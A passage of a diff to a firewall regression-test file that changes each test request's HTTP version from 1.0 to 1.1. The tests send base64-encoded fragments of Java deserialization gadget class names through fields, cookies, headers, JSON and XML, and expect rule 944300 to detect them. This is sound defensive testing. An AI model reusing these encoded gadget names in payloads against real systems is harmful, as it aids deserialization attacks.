           data: "{\"test\": \"GZvcmNsb3N1cmU\"}"
         output:
           log:
@@ -2418,7 +2418,7 @@ tests:
             Content-Type: "application/json"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "{\"GZvcmNsb3N1cmU\": \"test\"}"
         output:
           log:
@@ -2438,7 +2438,7 @@ tests:
             Content-Type: "application/x-www-form-urlencoded"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=Bmb3JjbG9zdXJl"
         output:
           log:
@@ -2458,7 +2458,7 @@ tests:
             Content-Type: "application/x-www-form-urlencoded"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "Bmb3JjbG9zdXJl=test"
         output:
           log:
@@ -2479,7 +2479,7 @@ tests:
             Cookie: test=Bmb3JjbG9zdXJl
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
         output:
           log:
             expect_ids: [944300]
@@ -2499,7 +2499,7 @@ tests:
             Cookie: Bmb3JjbG9zdXJl=test
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
         output:
           log:
             expect_ids: [944300]
@@ -2519,7 +2519,7 @@ tests:
             test: Bmb3JjbG9zdXJl
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
         output:
           log:
             expect_ids: [944300]
@@ -2538,7 +2538,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><element attribute_name=\"Bmb3JjbG9zdXJl\">element_value</element></xml>"
         output:
           log:
@@ -2558,7 +2558,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><element attribute_name=\"attribute_value\">Bmb3JjbG9zdXJl</element></xml>"
         output:
           log:
@@ -2578,7 +2578,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><l1><l2><l3><element attribute_name=\"attribute_value\">Bmb3JjbG9zdXJl</element></l3></l2></l1></xml>"
         output:
           log:
@@ -2598,7 +2598,7 @@ tests:
             Content-Type: "text/plain"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=Bmb3JjbG9zdXJl"
         output:
           log:
@@ -2618,7 +2618,7 @@ tests:
             Content-Type: "application/json"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "{\"test\": \"Bmb3JjbG9zdXJl\"}"
         output:
           log:
@@ -2638,7 +2638,7 @@ tests:
             Content-Type: "application/json"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "{\"Bmb3JjbG9zdXJl\": \"test\"}"
         output:
           log:
@@ -2658,7 +2658,7 @@ tests:
             Content-Type: "application/x-www-form-urlencoded"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=aW5zdGFudGlhdGVmYWN0b3J5"
         output:
           log:
@@ -2678,7 +2678,7 @@ tests:
             Content-Type: "application/x-www-form-urlencoded"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "aW5zdGFudGlhdGVmYWN0b3J5=test"
         output:
           log:
@@ -2699,7 +2699,7 @@ tests:
             Cookie: test=aW5zdGFudGlhdGVmYWN0b3J5
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
         output:
           log:
             expect_ids: [944300]
@@ -2719,7 +2719,7 @@ tests:
             Cookie: aW5zdGFudGlhdGVmYWN0b3J5=test
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
         output:
           log:
             expect_ids: [944300]
@@ -2739,7 +2739,7 @@ tests:
             test: aW5zdGFudGlhdGVmYWN0b3J5
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
         output:
           log:
             expect_ids: [944300]
@@ -2758,7 +2758,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><element attribute_name=\"aW5zdGFudGlhdGVmYWN0b3J5\">element_value</element></xml>"
         output:
           log:
@@ -2778,7 +2778,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><element attribute_name=\"attribute_value\">aW5zdGFudGlhdGVmYWN0b3J5</element></xml>"
         output:
           log:
@@ -2798,7 +2798,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><l1><l2><l3><element attribute_name=\"attribute_value\">aW5zdGFudGlhdGVmYWN0b3J5</element></l3></l2></l1></xml>"
         output:
           log:
@@ -2818,7 +2818,7 @@ tests:
             Content-Type: "text/plain"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=aW5zdGFudGlhdGVmYWN0b3J5"
         output:
           log:
@@ -2838,7 +2838,7 @@ tests:
             Content-Type: "application/json"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "{\"test\": \"aW5zdGFudGlhdGVmYWN0b3J5\"}"
         output:
           log:
@@ -2858,7 +2858,7 @@ tests:
             Content-Type: "application/json"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "{\"aW5zdGFudGlhdGVmYWN0b3J5\": \"test\"}"
         output:
           log:
@@ -2878,7 +2878,7 @@ tests:
             Content-Type: "application/x-www-form-urlencoded"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=Gluc3RhbnRpYXRlZmFjdG9yeQ"
         output:
           log:
@@ -2898,7 +2898,7 @@ tests:
             Content-Type: "application/x-www-form-urlencoded"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "Gluc3RhbnRpYXRlZmFjdG9yeQ=test"
         output:
           log:
@@ -2919,7 +2919,7 @@ tests:
             Cookie: test=Gluc3RhbnRpYXRlZmFjdG9yeQ
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
         output:
           log:
             expect_ids: [944300]
@@ -2939,7 +2939,7 @@ tests:
             Cookie: Gluc3RhbnRpYXRlZmFjdG9yeQ=test
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
         output:
           log:
             expect_ids: [944300]
@@ -2959,7 +2959,7 @@ tests:
             test: Gluc3RhbnRpYXRlZmFjdG9yeQ
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
         output:
           log:
             expect_ids: [944300]
@@ -2978,7 +2978,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><element attribute_name=\"Gluc3RhbnRpYXRlZmFjdG9yeQ\">element_value</element></xml>"
         output:
           log:
@@ -2998,7 +2998,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><element attribute_name=\"attribute_value\">Gluc3RhbnRpYXRlZmFjdG9yeQ</element></xml>"
         output:
           log:
@@ -3018,7 +3018,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><l1><l2><l3><element attribute_name=\"attribute_value\">Gluc3RhbnRpYXRlZmFjdG9yeQ</element></l3></l2></l1></xml>"
         output:
           log:
@@ -3038,7 +3038,7 @@ tests:
             Content-Type: "text/plain"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=Gluc3RhbnRpYXRlZmFjdG9yeQ"
         output:
           log:
@@ -3058,7 +3058,7 @@ tests:
             Content-Type: "application/json"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "{\"test\": \"Gluc3RhbnRpYXRlZmFjdG9yeQ\"}"
         output:
           log:
@@ -3078,7 +3078,7 @@ tests:
             Content-Type: "application/json"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "{\"Gluc3RhbnRpYXRlZmFjdG9yeQ\": \"test\"}"
         output:
           log:
@@ -3098,7 +3098,7 @@ tests:
             Content-Type: "application/x-www-form-urlencoded"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=BpbnN0YW50aWF0ZWZhY3Rvcnk"
         output:
           log:
@@ -3118,7 +3118,7 @@ tests:
             Content-Type: "application/x-www-form-urlencoded"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "BpbnN0YW50aWF0ZWZhY3Rvcnk=test"
         output:
           log:
@@ -3139,7 +3139,7 @@ tests:
             Cookie: test=BpbnN0YW50aWF0ZWZhY3Rvcnk
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
         output:
           log:
             expect_ids: [944300]
@@ -3159,7 +3159,7 @@ tests:
             Cookie: BpbnN0YW50aWF0ZWZhY3Rvcnk=test
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
         output:
           log:
             expect_ids: [944300]
@@ -3179,7 +3179,7 @@ tests:
             test: BpbnN0YW50aWF0ZWZhY3Rvcnk
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
         output:
           log:
             expect_ids: [944300]
@@ -3198,7 +3198,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><element attribute_name=\"BpbnN0YW50aWF0ZWZhY3Rvcnk\">element_value</element></xml>"
         output:
           log:
@@ -3218,7 +3218,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><element attribute_name=\"attribute_value\">BpbnN0YW50aWF0ZWZhY3Rvcnk</element></xml>"
         output:
           log:
@@ -3238,7 +3238,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><l1><l2><l3><element attribute_name=\"attribute_value\">BpbnN0YW50aWF0ZWZhY3Rvcnk</element></l3></l2></l1></xml>"
         output:
           log:
@@ -3258,7 +3258,7 @@ tests:
             Content-Type: "text/plain"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=BpbnN0YW50aWF0ZWZhY3Rvcnk"
         output:
           log:
@@ -3278,7 +3278,7 @@ tests:
             Content-Type: "application/json"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "{\"test\": \"BpbnN0YW50aWF0ZWZhY3Rvcnk\"}"
         output:
           log:
@@ -3298,7 +3298,7 @@ tests:
             Content-Type: "application/json"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "{\"BpbnN0YW50aWF0ZWZhY3Rvcnk\": \"test\"}"
         output:
           log:
@@ -3318,7 +3318,7 @@ tests:
             Content-Type: "application/x-www-form-urlencoded"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg"
         output:
           log:
@@ -3338,7 +3338,7 @@ tests:
             Content-Type: "application/x-www-form-urlencoded"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg=test"
         output:
           log:
@@ -3359,7 +3359,7 @@ tests:
             Cookie: test=aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
         output:
           log:
             expect_ids: [944300]
@@ -3379,7 +3379,7 @@ tests:
             Cookie: aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg=test
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
         output:
           log:
             expect_ids: [944300]
@@ -3399,7 +3399,7 @@ tests:
             test: aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
         output:
           log:
             expect_ids: [944300]
@@ -3418,7 +3418,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><element attribute_name=\"aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg\">element_value</element></xml>"
         output:
           log:
@@ -3438,7 +3438,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><element attribute_name=\"attribute_value\">aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg</element></xml>"
         output:
           log:
@@ -3458,7 +3458,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><l1><l2><l3><element attribute_name=\"attribute_value\">aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg</element></l3></l2></l1></xml>"
         output:
           log:
@@ -3478,7 +3478,7 @@ tests:
             Content-Type: "text/plain"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg"
         output:
           log:
@@ -3498,7 +3498,7 @@ tests:
             Content-Type: "application/json"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "{\"test\": \"aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg\"}"
         output:
           log:
@@ -3518,7 +3518,7 @@ tests:
             Content-Type: "application/json"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "{\"aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg\": \"test\"}"
         output:
           log:
@@ -3538,7 +3538,7 @@ tests:
             Content-Type: "application/x-www-form-urlencoded"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=Gluc3RhbnRpYXRldHJhbnNmb3JtZXI"
         output:
           log:
@@ -3558,7 +3558,7 @@ tests:
             Content-Type: "application/x-www-form-urlencoded"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "Gluc3RhbnRpYXRldHJhbnNmb3JtZXI=test"
         output:
           log:
@@ -3579,7 +3579,7 @@ tests:
             Cookie: test=Gluc3RhbnRpYXRldHJhbnNmb3JtZXI
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
         output:
           log:
             expect_ids: [944300]
@@ -3599,7 +3599,7 @@ tests:
             Cookie: Gluc3RhbnRpYXRldHJhbnNmb3JtZXI=test
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
         output:
           log:
             expect_ids: [944300]
@@ -3619,7 +3619,7 @@ tests:
             test: Gluc3RhbnRpYXRldHJhbnNmb3JtZXI
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
         output:
           log:
             expect_ids: [944300]
@@ -3638,7 +3638,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><element attribute_name=\"Gluc3RhbnRpYXRldHJhbnNmb3JtZXI\">element_value</element></xml>"
         output:
           log:
@@ -3658,7 +3658,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><element attribute_name=\"attribute_value\">Gluc3RhbnRpYXRldHJhbnNmb3JtZXI</element></xml>"
         output:
           log:
@@ -3678,7 +3678,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><l1><l2><l3><element attribute_name=\"attribute_value\">Gluc3RhbnRpYXRldHJhbnNmb3JtZXI</element></l3></l2></l1></xml>"
         output:
           log:
@@ -3698,7 +3698,7 @@ tests:
             Content-Type: "text/plain"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=Gluc3RhbnRpYXRldHJhbnNmb3JtZXI"
         output:
           log:
@@ -3718,7 +3718,7 @@ tests:
             Content-Type: "application/json"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "{\"test\": \"Gluc3RhbnRpYXRldHJhbnNmb3JtZXI\"}"
         output:
           log:
@@ -3738,7 +3738,7 @@ tests:
             Content-Type: "application/json"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "{\"Gluc3RhbnRpYXRldHJhbnNmb3JtZXI\": \"test\"}"
         output:
           log:
@@ -3758,7 +3758,7 @@ tests:
             Content-Type: "application/x-www-form-urlencoded"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy"
         output:
           log:
@@ -3778,7 +3778,7 @@ tests:
             Content-Type: "application/x-www-form-urlencoded"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy=test"
         output:
           log:
@@ -3799,7 +3799,7 @@ tests:
             Cookie: test=BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
         output:
           log:
             expect_ids: [944300]
@@ -3819,7 +3819,7 @@ tests:
             Cookie: BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy=test
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
         output:
           log:
             expect_ids: [944300]
@@ -3839,7 +3839,7 @@ tests:
             test: BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
         output:
           log:
             expect_ids: [944300]
@@ -3858,7 +3858,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><element attribute_name=\"BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy\">element_value</element></xml>"
         output:
           log:
@@ -3878,7 +3878,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><element attribute_name=\"attribute_value\">BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy</element></xml>"
         output:
           log:
@@ -3898,7 +3898,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><l1><l2><l3><element attribute_name=\"attribute_value\">BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy</element></l3></l2></l1></xml>"
         output:
           log:
@@ -3918,7 +3918,7 @@ tests:
             Content-Type: "text/plain"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy"
         output:
           log:
@@ -3938,7 +3938,7 @@ tests:
             Content-Type: "application/json"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "{\"test\": \"BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy\"}"
         output:
           log:
@@ -3958,7 +3958,7 @@ tests:
             Content-Type: "application/json"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "{\"BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy\": \"test\"}"
         output:
           log:
@@ -3978,7 +3978,7 @@ tests:
             Content-Type: "application/x-www-form-urlencoded"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=aW52b2tlcnRyYW5zZm9ybWVy"
         output:
           log:
@@ -3998,7 +3998,7 @@ tests:
             Content-Type: "application/x-www-form-urlencoded"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "aW52b2tlcnRyYW5zZm9ybWVy=test"
         output:
           log:
@@ -4019,7 +4019,7 @@ tests:
             Cookie: test=aW52b2tlcnRyYW5zZm9ybWVy
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
         output:
           log:
             expect_ids: [944300]
@@ -4039,7 +4039,7 @@ tests:
             Cookie: aW52b2tlcnRyYW5zZm9ybWVy=test
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
         output:
           log:
             expect_ids: [944300]
@@ -4059,7 +4059,7 @@ tests:
             test: aW52b2tlcnRyYW5zZm9ybWVy
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
         output:
           log:
             expect_ids: [944300]
@@ -4078,7 +4078,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><element attribute_name=\"aW52b2tlcnRyYW5zZm9ybWVy\">element_value</element></xml>"
         output:
           log:
@@ -4098,7 +4098,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><element attribute_name=\"attribute_value\">aW52b2tlcnRyYW5zZm9ybWVy</element></xml>"
         output:
           log:
@@ -4118,7 +4118,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><l1><l2><l3><element attribute_name=\"attribute_value\">aW52b2tlcnRyYW5zZm9ybWVy</element></l3></l2></l1></xml>"
         output:
           log:
@@ -4138,7 +4138,7 @@ tests:
             Content-Type: "text/plain"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=aW52b2tlcnRyYW5zZm9ybWVy"
         output:
           log:
@@ -4158,7 +4158,7 @@ tests:
             Content-Type: "application/json"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "{\"test\": \"aW52b2tlcnRyYW5zZm9ybWVy\"}"
         output:
           log:
@@ -4178,7 +4178,7 @@ tests:
             Content-Type: "application/json"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "{\"aW52b2tlcnRyYW5zZm9ybWVy\": \"test\"}"
         output:
           log:
@@ -4198,7 +4198,7 @@ tests:
             Content-Type: "application/x-www-form-urlencoded"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=Gludm9rZXJ0cmFuc2Zvcm1lcg"
         output:
           log:
@@ -4218,7 +4218,7 @@ tests:
             Content-Type: "application/x-www-form-urlencoded"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "Gludm9rZXJ0cmFuc2Zvcm1lcg=test"
         output:
           log:
@@ -4239,7 +4239,7 @@ tests:
             Cookie: test=Gludm9rZXJ0cmFuc2Zvcm1lcg
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
         output:
           log:
             expect_ids: [944300]
@@ -4259,7 +4259,7 @@ tests:
             Cookie: Gludm9rZXJ0cmFuc2Zvcm1lcg=test
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
         output:
           log:
             expect_ids: [944300]
@@ -4279,7 +4279,7 @@ tests:
             test: Gludm9rZXJ0cmFuc2Zvcm1lcg
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
         output:
           log:
             expect_ids: [944300]
@@ -4298,7 +4298,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><element attribute_name=\"Gludm9rZXJ0cmFuc2Zvcm1lcg\">element_value</element></xml>"
         output:
           log:
@@ -4318,7 +4318,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><element attribute_name=\"attribute_value\">Gludm9rZXJ0cmFuc2Zvcm1lcg</element></xml>"
         output:
           log:
@@ -4338,7 +4338,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><l1><l2><l3><element attribute_name=\"attribute_value\">Gludm9rZXJ0cmFuc2Zvcm1lcg</element></l3></l2></l1></xml>"
         output:
           log:
@@ -4358,7 +4358,7 @@ tests:
             Content-Type: "text/plain"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=Gludm9rZXJ0cmFuc2Zvcm1lcg"
         output:
           log:
@@ -4378,7 +4378,7 @@ tests:
             Content-Type: "application/json"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "{\"test\": \"Gludm9rZXJ0cmFuc2Zvcm1lcg\"}"
         output:
           log:
@@ -4398,7 +4398,7 @@ tests:
             Content-Type: "application/json"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "{\"Gludm9rZXJ0cmFuc2Zvcm1lcg\": \"test\"}"
         output:
           log:
@@ -4418,7 +4418,7 @@ tests:
             Content-Type: "application/x-www-form-urlencoded"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=BpbnZva2VydHJhbnNmb3JtZXI"
         output:
           log:
@@ -4438,7 +4438,7 @@ tests:
             Content-Type: "application/x-www-form-urlencoded"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "BpbnZva2VydHJhbnNmb3JtZXI=test"
         output:
           log:
@@ -4459,7 +4459,7 @@ tests:
             Cookie: test=BpbnZva2VydHJhbnNmb3JtZXI
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
         output:
           log:
             expect_ids: [944300]
@@ -4479,7 +4479,7 @@ tests:
             Cookie: BpbnZva2VydHJhbnNmb3JtZXI=test
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
         output:
           log:
             expect_ids: [944300]
@@ -4499,7 +4499,7 @@ tests:
             test: BpbnZva2VydHJhbnNmb3JtZXI
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
         output:
           log:
             expect_ids: [944300]
@@ -4518,7 +4518,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><element attribute_name=\"BpbnZva2VydHJhbnNmb3JtZXI\">element_value</element></xml>"
         output:
           log:
@@ -4538,7 +4538,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><element attribute_name=\"attribute_value\">BpbnZva2VydHJhbnNmb3JtZXI</element></xml>"
         output:
           log:
@@ -4558,7 +4558,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><l1><l2><l3><element attribute_name=\"attribute_value\">BpbnZva2VydHJhbnNmb3JtZXI</element></l3></l2></l1></xml>"
         output:
           log:
